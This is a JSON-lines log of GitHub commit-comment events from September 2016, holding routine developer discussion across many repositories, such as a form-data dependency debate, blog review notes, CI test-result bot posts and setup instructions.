{"id":"4577474448","type":"CommitCommentEvent","actor":{"login":"alexindigo"},"repo":{"name":"form-data/form-data"},"payload":{"comment":{"id":19063667,"position":null,"line":null,"path":null,"commit_id":"1749b78d50580fbd080e65c1eb9702ad4f4fc0c0","created_at":"2016-09-17T06:43:42Z","updated_at":"2016-09-17T06:43:42Z","body":"True, we're shipping artifacts to AWS several times a day and over time it accumulates to significant amount of extra traffic."}},"created_at":"2016-09-17T06:43:42Z"}
{"id":"4577476428","type":"CommitCommentEvent","actor":{"login":"samyonair"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":19063668,"position":null,"line":null,"path":null,"commit_id":"0fdf3bbd091e1f82825f205bfd9e620fb047c944","created_at":"2016-09-17T06:45:33Z","updated_at":"2016-09-17T06:45:33Z","body":"I am very sad,\r\n\r\nThank you for your great work over the last years. I wish you the Best for your further steps.\r\n\r\nI hope this project is not died with your step.\r\n\r\nBadly my skills are in translating and collecting data add this to code but working on Code I cannot, \r\nmy hope is someone will take over this great addon and works together with the com as you have done in the Past.\r\n\r\nGreetings Samyonair "}},"created_at":"2016-09-17T06:45:33Z"}
{"id":"4577477273","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"form-data/form-data"},"payload":{"comment":{"id":19063672,"position":null,"line":null,"path":null,"commit_id":"1749b78d50580fbd080e65c1eb9702ad4f4fc0c0","created_at":"2016-09-17T06:46:24Z","updated_at":"2016-09-17T06:46:24Z","body":"@mscdex Async 2 is modular so if you're concerned about browser bundle sizes you can cherry-pick their method use in your package.\r\n\r\n @alexindigo Is there no way [to cache](http://thenewstack.io/understanding-the-docker-cache-for-faster-builds/)-[things](https://docs.travis-ci.com/user/caching/)? Lodash has been it's current size for going on 9 months."}},"created_at":"2016-09-17T06:46:24Z"}
{"id":"4577477367","type":"CommitCommentEvent","actor":{"login":"sahrens"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19063673,"position":9,"line":106,"path":"Libraries/Interaction/InteractionManager.js","commit_id":"3b5e4cc59331b49d2ab8cf2fed74dabd2251fe9c","created_at":"2016-09-17T06:46:25Z","updated_at":"2016-09-17T06:46:25Z","body":"It will only warn if people actually try to call done though...if it ends up being annoying, please just nuke it.\n\n\n\nOn Sep 16, 2016, at 2:28 AM, Satyajit Sahoo <notifications@github.com<mailto:notifications@github.com>> wrote:\n\n\nIsn't this going to always warn in OSS. Will be annoying IMO.\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub<https://github.com/facebook/react-native/commit/3b5e4cc59331b49d2ab8cf2fed74dabd2251fe9c#commitcomment-19051279>, or mute the thread<https://github.com/notifications/unsubscribe-auth/ABcJxw2zg8KcGA1RwJ9a29C_-wPlru93ks5qqmEbgaJpZM4J-iaj>.\n"}},"created_at":"2016-09-17T06:46:25Z"}
{"id":"4577478235","type":"CommitCommentEvent","actor":{"login":"krishna201"},"repo":{"name":"krishna201/krishna201"},"payload":{"comment":{"id":19063675,"position":null,"line":null,"path":null,"commit_id":"2680a8ed8dc9be23df806796d731b5730f78676b","created_at":"2016-09-17T06:47:22Z","updated_at":"2016-09-17T06:47:22Z","body":"# krishna201\r\n\r\nA barebones Node.js app using [Express 4](http://expressjs.com/).\r\n\r\nThis application supports the [Getting Started with Node on Heroku](https://devcenter.heroku.com/articles/getting-started-with-nodejs) article - check it out.\r\n\r\n## Running Locally\r\n\r\nMake sure you have [Node.js](http://nodejs.org/) and the [Heroku Toolbelt](https://toolbelt.heroku.com/) installed.\r\n\r\n```sh\r\n$ git clone git@github.com:krishna201/krishna201.git # or clone your own fork\r\n$ cd krishna201\r\n$ npm install\r\n$ npm start\r\n```\r\n\r\nYour app should now be running on [localhost:5000](http://localhost:5000/).\r\n\r\n## Deploying to Heroku\r\n\r\n```\r\n$ heroku create\r\n$ git push heroku master\r\n$ heroku open\r\n```\r\nor\r\n\r\n[![Deploy to Heroku](https://www.herokucdn.com/deploy/button.png)](https://heroku.com/deploy)\r\n\r\n## Documentation\r\n\r\nFor more information about using Node.js on Heroku, see these Dev Center articles:\r\n\r\n- [Getting Started with Node.js on Heroku](https://devcenter.heroku.com/articles/getting-started-with-nodejs)\r\n- [Heroku Node.js Support](https://devcenter.heroku.com/articles/nodejs-support)\r\n- [Node.js on Heroku](https://devcenter.heroku.com/categories/nodejs)\r\n- [Best Practices for Node.js Development](https://devcenter.heroku.com/articles/node-best-practices)\r\n- [Using WebSockets on Heroku with Node.js](https://devcenter.heroku.com/articles/node-websockets)\r\n"}},"created_at":"2016-09-17T06:47:22Z"}
{"id":"4577480626","type":"CommitCommentEvent","actor":{"login":"krishna201"},"repo":{"name":"krishna201/krishna201"},"payload":{"comment":{"id":19063683,"position":null,"line":null,"path":null,"commit_id":"2680a8ed8dc9be23df806796d731b5730f78676b","created_at":"2016-09-17T06:49:40Z","updated_at":"2016-09-17T06:49:40Z","body":"hi"}},"created_at":"2016-09-17T06:49:40Z"}
{"id":"4577480881","type":"CommitCommentEvent","actor":{"login":"Pafcholini"},"repo":{"name":"CMRemix/android_device_samsung_trltetmo"},"payload":{"comment":{"id":19063684,"position":null,"line":null,"path":null,"commit_id":"f8e413dca09ff700163152eb25853647c4ce5ad5","created_at":"2016-09-17T06:49:54Z","updated_at":"2016-09-17T06:49:54Z","body":"We got note 4 nougat. As always the first issues are wifi, bluetooth, calls, fingerprint and data :D"}},"created_at":"2016-09-17T06:49:54Z"}
{"id":"4577481199","type":"CommitCommentEvent","actor":{"login":"njmordetzky"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19063686,"position":197,"line":30,"path":"css/1_header.scss","commit_id":"89878ce2e7caae267f6f616117de3ac67bcb63cc","created_at":"2016-09-17T06:50:10Z","updated_at":"2016-09-17T06:50:10Z","body":"kebab for camel conversion completed"}},"created_at":"2016-09-17T06:50:10Z"}
{"id":"4577481284","type":"CommitCommentEvent","actor":{"login":"alexindigo"},"repo":{"name":"form-data/form-data"},"payload":{"comment":{"id":19063689,"position":null,"line":null,"path":null,"commit_id":"1749b78d50580fbd080e65c1eb9702ad4f4fc0c0","created_at":"2016-09-17T06:50:13Z","updated_at":"2016-09-17T06:50:13Z","body":"My last comment wasn't specifically about lodash, but more in general thinking out loud about importance of the file size on the server side.\r\n\r\nI do like lodash, in places where I need it. I'm not using it wholesale though, but rather pick-n-choose separate packages, I think it's my favorite lodash feature :)"}},"created_at":"2016-09-17T06:50:13Z"}
{"id":"4577481601","type":"CommitCommentEvent","actor":{"login":"njmordetzky"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19063693,"position":197,"line":30,"path":"css/1_header.scss","commit_id":"89878ce2e7caae267f6f616117de3ac67bcb63cc","created_at":"2016-09-17T06:50:32Z","updated_at":"2016-09-17T06:50:32Z","body":"thanks for the explanation. makes sense\r\n"}},"created_at":"2016-09-17T06:50:32Z"}
{"id":"4577483369","type":"CommitCommentEvent","actor":{"login":"Jetski5822"},"repo":{"name":"OrchardCMS/Orchard2"},"payload":{"comment":{"id":19063698,"position":null,"line":null,"path":null,"commit_id":"3998aa66080cd8a660cb2b577168f45a847558c4","created_at":"2016-09-17T06:52:13Z","updated_at":"2016-09-17T06:52:13Z","body":"DnxInvisibleFolder ? Thought they got rid of \"Dnx\""}},"created_at":"2016-09-17T06:52:13Z"}
{"id":"4577484104","type":"CommitCommentEvent","actor":{"login":"infinity0"},"repo":{"name":"WhisperSystems/libsignal-service-java"},"payload":{"comment":{"id":19063699,"position":null,"line":null,"path":null,"commit_id":"8df830d052c092dd246ffb41aaff422dea7bfb50","created_at":"2016-09-17T06:52:58Z","updated_at":"2016-09-17T06:52:58Z","body":"@jotpe probably so it's constant time"}},"created_at":"2016-09-17T06:52:58Z"}
{"id":"4577484206","type":"CommitCommentEvent","actor":{"login":"SumuduFernando"},"repo":{"name":"SumuduFernando/multiboot-media-creator"},"payload":{"comment":{"id":19063701,"position":null,"line":null,"path":null,"commit_id":"014272c5b071a27621ece1fa9d895fcd4d482608","created_at":"2016-09-17T06:53:05Z","updated_at":"2016-09-17T06:53:05Z","body":"I changed the version number from 0.7 to 0.7.1 just prior to making the previous commit. After some time I downloaded it and tried to run it and Python gave the error \"SyntaxError: invalid syntax\" just because of that version number change. So I changed it to 0.8"}},"created_at":"2016-09-17T06:53:05Z"}
{"id":"4577486412","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"form-data/form-data"},"payload":{"comment":{"id":19063708,"position":null,"line":null,"path":null,"commit_id":"1749b78d50580fbd080e65c1eb9702ad4f4fc0c0","created_at":"2016-09-17T06:55:15Z","updated_at":"2016-09-17T06:55:15Z","body":"@alexindigo\r\n> My last comment wasn't specifically about lodash, but more in general thinking out loud about importance of the file size on the server side.\r\n\r\nIt seems a bit like a premature optimization.\r\n\r\n> I do like lodash, in places where I need it. I'm not using it wholesale though, but rather pick-n-choose separate packages, I think it's my favorite lodash feature :)\r\n\r\nCheck our [roadmap](https://github.com/lodash/lodash/wiki/Roadmap#v500-2017)."}},"created_at":"2016-09-17T06:55:15Z"}
{"id":"4577487358","type":"CommitCommentEvent","actor":{"login":"ssbn-412-42"},"repo":{"name":"ssbn-412-42/Leaning"},"payload":{"comment":{"id":19063710,"position":null,"line":null,"path":null,"commit_id":"21992006a2c24c9882404dcbea03503cb8523030","created_at":"2016-09-17T06:56:10Z","updated_at":"2016-09-17T06:56:10Z","body":"把主要的框架搭建一下\r\n"}},"created_at":"2016-09-17T06:56:10Z"}
{"id":"4577487884","type":"CommitCommentEvent","actor":{"login":"PascalPrecht"},"repo":{"name":"thoughtram/blog"},"payload":{"comment":{"id":19063711,"position":5,"line":5,"path":"_posts/2016-09-16-angular-2-animation-important-concepts","commit_id":"fe42eb24e9723904ebd29189e2033f760067528c","created_at":"2016-09-17T06:56:39Z","updated_at":"2016-09-17T06:56:39Z","body":"This will be the date when the article is published"}},"created_at":"2016-09-17T06:56:39Z"}
{"id":"4577488189","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19063712,"position":null,"line":null,"path":null,"commit_id":"7440a10dea02a9331ad457fed8bbec30fd4df8a2","created_at":"2016-09-17T06:56:55Z","updated_at":"2016-09-17T06:56:55Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (1781 of 2371 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7440a10dea02a9331ad457fed8bbec30fd4df8a2-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7440a10dea02a9331ad457fed8bbec30fd4df8a2-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.12%25-red.svg)</a> \n"}},"created_at":"2016-09-17T06:56:55Z"}
{"id":"4577490386","type":"CommitCommentEvent","actor":{"login":"PascalPrecht"},"repo":{"name":"thoughtram/blog"},"payload":{"comment":{"id":19063718,"position":1,"line":1,"path":"_posts/2016-09-16-angular-2-animation-important-concepts","commit_id":"fe42eb24e9723904ebd29189e2033f760067528c","created_at":"2016-09-17T06:58:49Z","updated_at":"2016-09-17T06:58:49Z","body":"This needs to be an `.md` file otherwise the article won't show up in our blog"}},"created_at":"2016-09-17T06:58:49Z"}
{"id":"4577490824","type":"CommitCommentEvent","actor":{"login":"kolkov"},"repo":{"name":"angular-ui/ui-router"},"payload":{"comment":{"id":19063721,"position":null,"line":null,"path":null,"commit_id":"4ce27c92c7bef9986856d45ee2fa376eab3305e1","created_at":"2016-09-17T06:59:13Z","updated_at":"2016-09-17T06:59:13Z","body":"Wow! I check it right now!"}},"created_at":"2016-09-17T06:59:13Z"}
{"id":"4577491760","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19063723,"position":null,"line":null,"path":null,"commit_id":"a19ddcc005bd09857724e451c8c241b5e1660b8e","created_at":"2016-09-17T07:00:03Z","updated_at":"2016-09-17T07:00:03Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1765 of 1766 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-17T07:00:03Z"}
{"id":"4577493875","type":"CommitCommentEvent","actor":{"login":"PascalPrecht"},"repo":{"name":"thoughtram/blog"},"payload":{"comment":{"id":19063744,"position":26,"line":26,"path":"_posts/2016-09-16-angular-2-animation-important-concepts","commit_id":"fe42eb24e9723904ebd29189e2033f760067528c","created_at":"2016-09-17T07:01:29Z","updated_at":"2016-09-17T07:01:29Z","body":"How about a little intro paragraph that prepares the reader what to expect in this article?"}},"created_at":"2016-09-17T07:01:29Z"}
{"id":"4577494992","type":"CommitCommentEvent","actor":{"login":"PascalPrecht"},"repo":{"name":"thoughtram/blog"},"payload":{"comment":{"id":19063750,"position":54,"line":54,"path":"_posts/2016-09-16-angular-2-animation-important-concepts","commit_id":"fe42eb24e9723904ebd29189e2033f760067528c","created_at":"2016-09-17T07:02:21Z","updated_at":"2016-09-17T07:02:21Z","body":"Not sure if that was intentionally (and might be fixed later), but this plunk doesn't show the component introduced in this article"}},"created_at":"2016-09-17T07:02:21Z"}
{"id":"4577497815","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19063755,"position":null,"line":null,"path":null,"commit_id":"7440a10dea02a9331ad457fed8bbec30fd4df8a2","created_at":"2016-09-17T07:03:45Z","updated_at":"2016-09-17T07:03:45Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7440a10dea02a9331ad457fed8bbec30fd4df8a2-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-17T07:03:45Z"}
{"id":"4577498168","type":"CommitCommentEvent","actor":{"login":"whpiano"},"repo":{"name":"whpiano/python"},"payload":{"comment":{"id":19063757,"position":null,"line":null,"path":null,"commit_id":"40829c1e67ae7362fd2b557cfb81fc30e6953dd0","created_at":"2016-09-17T07:04:04Z","updated_at":"2016-09-17T07:04:04Z","body":"![](http://pic.meizitu.com/wp-content/uploads/2011a/12/09/08.jpg)\r\n![](http://pic.meizitu.com/wp-content/uploads/2011a/12/09/02.jpg)\r\n![](http://pic.meizitu.com/wp-content/uploads/2011a/12/09/03.jpg)\r\n![](http://pic.meizitu.com/wp-content/uploads/2011a/12/09/04.jpg)\r\n![](http://pic.meizitu.com/wp-content/uploads/2011a/12/09/05.jpg)\r\n![](http://pic.meizitu.com/wp-content/uploads/2011a/12/09/06.jpg)\r\n![](http://pic.meizitu.com/wp-content/uploads/2011a/12/09/07.jpg)\r\n![](http://pic.meizitu.com/wp-content/uploads/2011a/12/09/01.jpg)\r\n![](http://pic.meizitu.com/wp-content/uploads/2011a/12/09/09.jpg)"}},"created_at":"2016-09-17T07:04:04Z"}
{"id":"4577499030","type":"CommitCommentEvent","actor":{"login":"PascalPrecht"},"repo":{"name":"thoughtram/blog"},"payload":{"comment":{"id":19063759,"position":76,"line":76,"path":"_posts/2016-09-16-angular-2-animation-important-concepts","commit_id":"fe42eb24e9723904ebd29189e2033f760067528c","created_at":"2016-09-17T07:04:52Z","updated_at":"2016-09-17T07:04:52Z","body":"Here's an idea:\r\n\r\nDoing things like adding a new property to a component's metadata, I think it's always good to show *where* this goes. So maybe sth. like this:\r\n\r\n```\r\n@Component({\r\n  ...\r\n  animations: [\r\n    ...\r\n  ]\r\n})\r\n```\r\n^ now the reader can actually see, that this `animations` property goes *into* the `@Component` decorator."}},"created_at":"2016-09-17T07:04:52Z"}
{"id":"4577499046","type":"CommitCommentEvent","actor":{"login":"alexindigo"},"repo":{"name":"form-data/form-data"},"payload":{"comment":{"id":19063761,"position":null,"line":null,"path":null,"commit_id":"1749b78d50580fbd080e65c1eb9702ad4f4fc0c0","created_at":"2016-09-17T07:04:53Z","updated_at":"2016-09-17T07:04:53Z","body":"This? :)\r\n\r\n![modular lodash](http://ia.gs/2Q0C0c193Q0G/Image%202016-09-16%20at%2011.59.16%20PM.png)\r\n\r\nSo should I say \"It _was_ my favorite feature\"? :)\r\n\r\nAnd by modular lodash – you mean `import` + `.mjs` with `webpack@2` building it's own tree or something else? :)\r\n\r\nAs for premature optimization, thinking out loud never premature :) and we do pay real money for the traffic, I don't have exact numbers yet, but I should have something by the end of the year for sure.\r\n\r\nMy main pet peeve isn't with the file size, but with unused code. I think similar sentiment led you to come  up with per-method packages idea."}},"created_at":"2016-09-17T07:04:53Z"}
{"id":"4577500405","type":"CommitCommentEvent","actor":{"login":"masoud-omidvar"},"repo":{"name":"Urigo/meteor-angular-socially"},"payload":{"comment":{"id":19063770,"position":null,"line":null,"path":null,"commit_id":"2a3368b12bc6865b2ea0309f61634eee69d558b1","created_at":"2016-09-17T07:06:02Z","updated_at":"2016-09-17T07:06:02Z","body":"Based on Step-3.1, another model is created on 'collection/parites.js'. So, we must remove that one to prevent following error:\r\n\r\nThere is already a collection named \"parties\" "}},"created_at":"2016-09-17T07:06:02Z"}
{"id":"4577500961","type":"CommitCommentEvent","actor":{"login":"hcjhope"},"repo":{"name":"lizhiqianduan/ng2-xiaohei-blog"},"payload":{"comment":{"id":19063775,"position":null,"line":null,"path":null,"commit_id":"10cdcd19e852cfac8cb374a73c72b8cad9684d8d","created_at":"2016-09-17T07:06:29Z","updated_at":"2016-09-17T07:06:29Z","body":"修改了package\r\n"}},"created_at":"2016-09-17T07:06:29Z"}
{"id":"4577502932","type":"CommitCommentEvent","actor":{"login":"targos"},"repo":{"name":"image-js/core"},"payload":{"comment":{"id":19063791,"position":6,"line":108,"path":"src/image/roi/manager.js","commit_id":"efc25f34190a7b7a3e29f80029e263bd53ec4a9c","created_at":"2016-09-17T07:08:19Z","updated_at":"2016-09-17T07:08:19Z","body":"can you please throw an error here ?"}},"created_at":"2016-09-17T07:08:19Z"}
{"id":"4577504058","type":"CommitCommentEvent","actor":{"login":"JuanjoUE"},"repo":{"name":"ReVision-Docencia-20/Columnas"},"payload":{"comment":{"id":19063793,"position":null,"line":null,"path":null,"commit_id":"741fa2a08571b693a311a5bf36a94a2dfe307461","created_at":"2016-09-17T07:09:17Z","updated_at":"2016-09-17T07:09:17Z","body":"Ayuda: no me atrevo a tocxar nada por \"miedo\". \r\n¿cómo proceder? ¿añado frases o párrafos directamente o los pongo aquí como comentarios?\r\n"}},"created_at":"2016-09-17T07:09:17Z"}
{"id":"4577504147","type":"CommitCommentEvent","actor":{"login":"targos"},"repo":{"name":"image-js/core"},"payload":{"comment":{"id":19063794,"position":4,"line":79,"path":"package.json","commit_id":"4ffeb2f992e19cef9cd491949175341e56970f2a","created_at":"2016-09-17T07:09:22Z","updated_at":"2016-09-17T07:09:22Z","body":"can you put this in dev dependencies ?"}},"created_at":"2016-09-17T07:09:22Z"}
{"id":"4577505823","type":"CommitCommentEvent","actor":{"login":"AndropaX"},"repo":{"name":"Xiaomi-Mi4c-CyanogenMod-14/Resurrected-Kernel"},"payload":{"comment":{"id":19063799,"position":null,"line":null,"path":null,"commit_id":"e09129f34c67f5fbd1ded362c39fec1f66302365","created_at":"2016-09-17T07:10:56Z","updated_at":"2016-09-17T07:10:56Z","body":"Bricked hotplug won't work with MSM core ctrl."}},"created_at":"2016-09-17T07:10:56Z"}
{"id":"4577505854","type":"CommitCommentEvent","actor":{"login":"riteshshrv"},"repo":{"name":"riteshshrv/shop"},"payload":{"comment":{"id":19063800,"position":9,"line":60,"path":"shop/user/models.py","commit_id":"6c0969f9e16830cc4306bee41fe8079395cf429d","created_at":"2016-09-17T07:10:58Z","updated_at":"2016-09-17T07:10:58Z","body":"`flip_give_token`"}},"created_at":"2016-09-17T07:10:58Z"}
{"id":"4577506316","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19063804,"position":null,"line":null,"path":null,"commit_id":"ee719dbb55f5d6216b3f4b6a73b1d9bbfd50ea03","created_at":"2016-09-17T07:11:21Z","updated_at":"2016-09-17T07:11:21Z","body":"@mcostalba ok I will do it.  thanks"}},"created_at":"2016-09-17T07:11:21Z"}
{"id":"4577509536","type":"CommitCommentEvent","actor":{"login":"ttimz1313"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19063817,"position":null,"line":null,"path":null,"commit_id":"aa19ad1b99979ed4a1ac36242546cdee55325b43","created_at":"2016-09-17T07:14:12Z","updated_at":"2016-09-17T07:14:12Z","body":"aa19ad1"}},"created_at":"2016-09-17T07:14:12Z"}
{"id":"4577509750","type":"CommitCommentEvent","actor":{"login":"riteshshrv"},"repo":{"name":"riteshshrv/shop"},"payload":{"comment":{"id":19063818,"position":4,"line":68,"path":"shop/cart/models.py","commit_id":"6c0969f9e16830cc4306bee41fe8079395cf429d","created_at":"2016-09-17T07:14:24Z","updated_at":"2016-09-17T07:14:24Z","body":"`flipgive.campaign`"}},"created_at":"2016-09-17T07:14:24Z"}
{"id":"4577510100","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19063819,"position":null,"line":null,"path":null,"commit_id":"263a9efd9bdb6421badcba2517d1052b3a4d025b","created_at":"2016-09-17T07:14:42Z","updated_at":"2016-09-17T07:14:42Z","body":"Well, clearly something different should be attempted... :-)\n"}},"created_at":"2016-09-17T07:14:42Z"}
{"id":"4577511741","type":"CommitCommentEvent","actor":{"login":"jamrizzi"},"repo":{"name":"jamrizzi/deskterm"},"payload":{"comment":{"id":19063825,"position":null,"line":null,"path":null,"commit_id":"e9c8347a16497b44e9a9428ad15441a5539bd8d7","created_at":"2016-09-17T07:16:13Z","updated_at":"2016-09-17T07:16:13Z","body":"I'll build an installer for it. For now, just delete the following lines\nfrom ~/.profile. That should at least disable it.\n\ndevilspie2\nsleep 4s\ngnome-terminal --window-with-profile=Deskterm --role=Deskterm --hide-menubar\n\nWould you mind explaining the trouble you were having with it? Also, what\noperating system are you using.\n\nOn Fri, Sep 16, 2016, 22:50 Logan <notifications@github.com> wrote:\n\n> Hey, I like the idea but unfortunately I had some trouble on my system and\n> I was wondering how it would be best to uninstall/remove it?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jamrizzi/deskterm/commit/e9c8347a16497b44e9a9428ad15441a5539bd8d7#commitcomment-19062937>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AF8ftp5frBwApZoLG9vuDg-pZnYDwsS8ks5qq2OGgaJpZM4J_f17>\n> .\n>\n-- \n- Jam Risser\n"}},"created_at":"2016-09-17T07:16:13Z"}
{"id":"4577513103","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"form-data/form-data"},"payload":{"comment":{"id":19063828,"position":null,"line":null,"path":null,"commit_id":"1749b78d50580fbd080e65c1eb9702ad4f4fc0c0","created_at":"2016-09-17T07:17:33Z","updated_at":"2016-09-17T07:17:33Z","body":"> thinking out loud never premature :) \r\n\r\nIt's a bit more when you commit code.\r\n\r\n>  I don't have exact numbers yet, but I should have something by the end of the year for sure.\r\n\r\nSounds like something you could optimize better with a pre-process.\r\n\r\n> My main pet peeve isn't with the file size, but with unused code. \r\n\r\nSo you switch from something that was modular (async 2) to something more monolithic (asynckit)?\r\n\r\n> I think similar sentiment led you to come up with per-method packages idea.\r\n\r\nNope. I try to be unopinionated and meet devs where they are. But as time has gone on I'm starting to get jaded by dev superstition and hangups. Since I have the numbers now I'm starting to get more opinionated and will start enforcing that opinion through package support.\r\n"}},"created_at":"2016-09-17T07:17:33Z"}
{"id":"4577513122","type":"CommitCommentEvent","actor":{"login":"skarcha"},"repo":{"name":"jmayoralas/Z80VirtualMachineKit"},"payload":{"comment":{"id":19063829,"position":17,"line":27,"path":"Z80VirtualMachineKit/Z80VirtualMachineKit/Tape.swift","commit_id":"f3a84407e53450ee44e4d5d3fbc816156a8a783f","created_at":"2016-09-17T07:17:35Z","updated_at":"2016-09-17T07:17:35Z","body":"Typo: it should be **kTStatesPerMilliSecond**\r\n\r\nI can't help more than this at the moment... :angel: "}},"created_at":"2016-09-17T07:17:35Z"}
{"id":"4577513262","type":"CommitCommentEvent","actor":{"login":"lucko"},"repo":{"name":"lucko/FactionsFramework"},"payload":{"comment":{"id":19063830,"position":null,"line":null,"path":null,"commit_id":"d5411c5d593190832233cf3367919742e285b675","created_at":"2016-09-17T07:17:44Z","updated_at":"2016-09-17T07:17:44Z","body":"The Vault comparison is pretty good. Hadn't thought of it like that before. 😄 Although, if you're aiming to be \"like\" Vault, separating out the API into a separate project or module could be a good idea. You know, just a bunch of interfaces, some class to get access via static, and then register your main interface in the Bukkit service manager, or whatever.\r\n\r\nBad example of what I mean: https://github.com/lucko/LuckPerms/tree/master/api\r\nVault does the same: https://github.com/MilkBowl/VaultAPI/tree/master/src/main/java/net/milkbowl/vault\r\n\r\nEffectively, that way, you just define the \"FactionsFrameworkAPI\" separately, and then implement it in the plugin (this is exactly what Vault does). That way you avoid all of the horrible static, and just access everything through one interface.\r\n\r\nLooking forward to seeing the library, definitely let me know. If you want/need any code contributions, I'm more than happy to spend some time contributing, again, just let me know. \r\n\r\nThanks again for your great work!"}},"created_at":"2016-09-17T07:17:44Z"}
{"id":"4577514508","type":"CommitCommentEvent","actor":{"login":"jchiem"},"repo":{"name":"jchiem/angular-course"},"payload":{"comment":{"id":19063832,"position":null,"line":null,"path":null,"commit_id":"e238353ecfe83addcce6436308075633e8cdda56","created_at":"2016-09-17T07:18:52Z","updated_at":"2016-09-17T07:18:52Z","body":"wrongfully made pull request from master to assignment-1 "}},"created_at":"2016-09-17T07:18:52Z"}
{"id":"4577516539","type":"CommitCommentEvent","actor":{"login":"MikuAuahDark"},"repo":{"name":"MikuAuahDark/NPPS"},"payload":{"comment":{"id":19063836,"position":null,"line":null,"path":null,"commit_id":"b86dfb7cd10a05c268173183d03916763078924e","created_at":"2016-09-17T07:20:40Z","updated_at":"2016-09-17T07:20:40Z","body":"try to edit your `php.ini` and set `display_errors = on`."}},"created_at":"2016-09-17T07:20:40Z"}
{"id":"4577519831","type":"CommitCommentEvent","actor":{"login":"alexindigo"},"repo":{"name":"form-data/form-data"},"payload":{"comment":{"id":19063839,"position":null,"line":null,"path":null,"commit_id":"1749b78d50580fbd080e65c1eb9702ad4f4fc0c0","created_at":"2016-09-17T07:23:33Z","updated_at":"2016-09-17T07:23:33Z","body":"1. My commit was driven by the reasons I explained above – to reduce amount of _unused_ code in the library, it had nothing to do with lodash, but with async itself. As I pointed out in the links it was the plan for some time, long before that twit happened.\r\n\r\n2. Do you mind to enlighten me on meaning of \"modular\" here? Something that webpack@2 can slice and dice or there is more to it?\r\n\r\n3. So we have different sentiments :)\r\n\r\n"}},"created_at":"2016-09-17T07:23:33Z"}
{"id":"4577520474","type":"CommitCommentEvent","actor":{"login":"targos"},"repo":{"name":"image-js/core"},"payload":{"comment":{"id":19063840,"position":null,"line":null,"path":null,"commit_id":"57f9ee037075b23603799f8bf3fd10f11ce40039","created_at":"2016-09-17T07:24:07Z","updated_at":"2016-09-17T07:24:07Z","body":"regression test ! ;)"}},"created_at":"2016-09-17T07:24:07Z"}
{"id":"4577520696","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"oe-alliance/e2openplugins"},"payload":{"comment":{"id":19063841,"position":null,"line":null,"path":null,"commit_id":"28d18eb019211edaa92f9e539a7dd27cfcfa63c0","created_at":"2016-09-17T07:24:18Z","updated_at":"2016-09-17T07:24:18Z","body":"The recipe 'hetweer' is supposed to build from https://github.com/E2OpenPlugins/e2openplugin-HetWeer, but it doesn't.\r\nOr better: it still builds an old version, while the source has been updated.\r\nAny idea how to correct that?"}},"created_at":"2016-09-17T07:24:18Z"}
{"id":"4577520738","type":"CommitCommentEvent","actor":{"login":"tolyo"},"repo":{"name":"base-apps/angular-base-apps-template"},"payload":{"comment":{"id":19063842,"position":11,"line":13,"path":"brunch-config.js","commit_id":"dce1642b0a106c6539ed993b0a11cd6b43c90fc0","created_at":"2016-09-17T07:24:20Z","updated_at":"2016-09-17T07:24:20Z","body":"@soumak77 There were files being generated in both `public` **and** `build` folder in the previous config."}},"created_at":"2016-09-17T07:24:20Z"}
